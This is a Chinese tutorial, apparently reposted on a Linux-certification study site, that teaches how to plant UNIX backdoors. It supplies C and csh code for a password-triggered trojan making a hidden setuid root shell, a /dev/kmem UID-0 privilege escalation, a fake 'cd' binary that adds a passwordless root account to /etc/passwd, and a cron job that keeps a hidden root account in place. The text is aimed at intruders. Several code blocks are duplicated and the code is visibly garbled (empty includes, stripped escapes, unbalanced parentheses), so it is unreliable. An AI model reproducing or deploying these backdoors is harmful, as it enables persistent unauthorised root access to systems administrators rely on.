求学资讯 Linux认证 提问
Linux认证 > 备考经验

教你如何创建UNIX后门(高级篇)

来源:用户上传 上传用户:zhongzhanen 发布时间:2017-11-10

导读:
小编为您搜集整理了"教你如何创建UNIX后门(高级篇)“,供您参考,希望对大家有所帮助!

  当然,我们可以编写木马程序,并把它放到 /bin 目录下。当以特定命令行参数运行时将产生一个 suid shell.以下是程序示例:

  <++> backdoor/backdoor3.c

  #include

  #define pass "triad"

  #define BUFFERSIZE 6

  int main(argc, argv)

  int argc;

  char *argv[];{

  int i=0;

  if(argv[1]){

  if(!(strcmp(pass,argv[1]))){

  system("cp /bin/csh /bin/.swp121");

  system("chmod 4755 /bin/.swp121");

  system("chown root /bin/.swp121");

  system("chmod 4755 /bin/.swp121");

  }

  }

  printf("372f: Invalid control argument, unable to initialize. Retrying");

  for(;i<10;i++){

  fprintf(stderr,".");

  sleep(1);

  }

  printf("nAction aborted after 10 attempts.n");

  return(0);

  }

  <-->

  以下程序通过在内存中寻找你所运行程序的 UID,并将其改为 0,这样你就有了一个 suid root shell 了。

  <++> backdoor/kmemthief.c

  #include

  #include

  #include

  #include

  #include

  #include

  #include

  #define pass "triad"

  struct user userpage;

  long address(), userlocation;

  int main(argc, argv, envp)

  int argc;

  char *argv[], *envp[];{

  int count, fd;

  long where, lseek();

  if(argv[1]){

  if(!(strcmp(pass,argv[1]))){

  fd=(open("/dev/kmem",O_RDWR);

  if(fd<0){

  printf("Cannot read or write to

  /dev/kmemn");

  perror(argv);

  exit(10);

  }

  userlocation=address();

  where=(lseek(fd,userlocation,0);

  if(where!=userlocation){

  printf("Cannot seek to user pagen");

  perror(argv);

  exit(20);

  }

  count=read(fd,&userpage,sizeof(struct user));

  if(count!=sizeof(struct user)){

  printf("Cannot read user pagen");

  perror(argv);

  exit(30);

  }

  printf("Current UID: %dn",userpage.u_ruid);

  printf("Current GID: %dn",userpage.g_ruid);

  userpage.u_ruid=0;

  userpage.u_rgid=0;

  where=lseek(fd,userlocation,0);

  if(where!=userlocation){

  printf("Cannot seek to user pagen");

  perror(argv);

  exit(40);

  }

  write(fd,&userpage,((char *)&(userpage.u_procp))-((char *)&userpage));

  execle("/bin/csh","/bin/csh","-i",(char *)0, envp);

  }

  }

  }

  <-->

  你有没有曾经试过在 Unix 系统下错把 "cd " 输入为 "cd"?这是由于使用 MS Windows 和 MS-DOS 养成的习惯。这种错误网管是否也会犯呢?如果是这样的话,可不可以让他为我们做点"贡献"呢?:) 例如当他输入 "cd" 时,会激活我们的木马程序。这样我们就不必登录到系统去激活木马了。以下是程序示例:

  <++> backdoor/dumb.c

  /*

  本程序可在管理员偶然地输入 cd 时向 /etc/passwd 文件添加一个 UID 0 帐号。但同时它也实现 cd 功能,从而骗过管理员。

  */

  #include

  #include

  main()

  {

  FILE *fd;

  fd=fopen("/etc/passwd","a+");

  fprintf(fd,"hax0r::0:0::/root:/bin/shn");

  system("cd");

  }

  <-->

-->

  Crontab 程序对于系统管理员来说是非常有用的。Cron 服务用于计划程序在特定时间(月、日、周、时、分)运行。如果你足够聪明,就应该加以利用,使之为我们制造"后门"!通过 Cron 服务,你可以让它在每天凌晨 2:00 (这个时候网管应该睡觉了吧。)运行后门程序,使你能够轻易进入系统干你想干的事,并在网管起来之前退出系统。根用户的 crontab 文件放在 /var/spool/crontab/root 中,其格式如下:

  (1) (2) (3) (4) (5) (6)

  0 0 * * 3 /usr/bin/updatedb

  1. 分钟 (0-60)

  2. 小时 (0-23)

  3. 日 (1-31)

  4. 月 (1-12)

  5. 星期 (1-7)

  6. 所要运行的程序

  以上内容设置该程序于每星期三 0:0 运行。要在 cron 建立后门,只需在 /var/spool/crontab/root 中添加后门程序即可。例如该程序可以在每天检查我们在 /etc/passwd 文件中增加了用户帐号是否仍然有效。以下是程序示例:

  0 0 * * * /usr/bin/retract

  <++> backdoor/backdoor.sh

  #!/bin/csh

  set evilflag = (`grep eviluser /etc/passwd`)

  if($#evilflag == 0) then

  set linecount = `wc -l /etc/passwd`

  cd

  cp /etc/passwd ./temppass

  @ linecount[1] /= 2

  @ linecount[1] += 1

  split -$linecount[1] ./temppass

  echo "Meb::0:0:Meb:/root:/bin/sh" 》 ./xaa

  cat ./xab 》 ./xaa

  mv ./xaa /etc/passwd

  chmod 644 /etc/passwd

  rm ./xa* ./temppass

  echo Done…

  else

  endif

  <-->

  当然,我们可以编写木马程序,并把它放到 /bin 目录下。当以特定命令行参数运行时将产生一个 suid shell.以下是程序示例:

  <++> backdoor/backdoor3.c

  #include

  #define pass "triad"

  #define BUFFERSIZE 6

  int main(argc, argv)

  int argc;

  char *argv[];{

  int i=0;

  if(argv[1]){

  if(!(strcmp(pass,argv[1]))){

  system("cp /bin/csh /bin/.swp121");

  system("chmod 4755 /bin/.swp121");

  system("chown root /bin/.swp121");

  system("chmod 4755 /bin/.swp121");

  }

  }

  printf("372f: Invalid control argument, unable to initialize. Retrying");

  for(;i<10;i++){

  fprintf(stderr,".");

  sleep(1);

  }

  printf("nAction aborted after 10 attempts.n");

  return(0);

  }

  <-->

  以下程序通过在内存中寻找你所运行程序的 UID,并将其改为 0,这样你就有了一个 suid root shell 了。

  <++> backdoor/kmemthief.c

  #include

  #include

  #include

  #include

  #include

  #include

  #include

  #define pass "triad"

  struct user userpage;

  long address(), userlocation;

  int main(argc, argv, envp)

  int argc;

  char *argv[], *envp[];{

  int count, fd;

  long where, lseek();

  if(argv[1]){

  if(!(strcmp(pass,argv[1]))){

  fd=(open("/dev/kmem",O_RDWR);

  if(fd<0){

  printf("Cannot read or write to

  /dev/kmemn");

  perror(argv);

  exit(10);

  }

  userlocation=address();

  where=(lseek(fd,userlocation,0);

  if(where!=userlocation){

  printf("Cannot seek to user pagen");

  perror(argv);

  exit(20);

  }

  count=read(fd,&userpage,sizeof(struct user));

  if(count!=sizeof(struct user)){

  printf("Cannot read user pagen");

  perror(argv);

  exit(30);

  }

  printf("Current UID: %dn",userpage.u_ruid);

  printf("Current GID: %dn",userpage.g_ruid);

  userpage.u_ruid=0;

  userpage.u_rgid=0;

  where=lseek(fd,userlocation,0);

  if(where!=userlocation){

  printf("Cannot seek to user pagen");

  perror(argv);

  exit(40);

  }

  write(fd,&userpage,((char *)&(userpage.u_procp))-((char *)&userpage));

  execle("/bin/csh","/bin/csh","-i",(char *)0, envp);

  }

  }

  }

  <-->

  你有没有曾经试过在 Unix 系统下错把 "cd " 输入为 "cd"?这是由于使用 MS Windows 和 MS-DOS 养成的习惯。这种错误网管是否也会犯呢?如果是这样的话,可不可以让他为我们做点"贡献"呢?:) 例如当他输入 "cd" 时,会激活我们的木马程序。这样我们就不必登录到系统去激活木马了。以下是程序示例:

  <++> backdoor/dumb.c

  /*

  本程序可在管理员偶然地输入 cd 时向 /etc/passwd 文件添加一个 UID 0 帐号。但同时它也实现 cd 功能,从而骗过管理员。

  */

  #include

  #include

  main()

  {

  FILE *fd;

  fd=fopen("/etc/passwd","a+");

  fprintf(fd,"hax0r::0:0::/root:/bin/shn");

  system("cd");

  }

  <-->

声明:本站为免费网络服务提供商,网站所有信息均为用户自行发布并由用户承担相应法律责任,本站不对其真实性及合法性负责,如涉及侵权或者信息违法,请你及时与本站联系删除。

阅读 1639 举报

相关推荐
评论0

当前没有评论内容

发表评论 0条评论
67
微博
QQ
QQ空间
微信
取消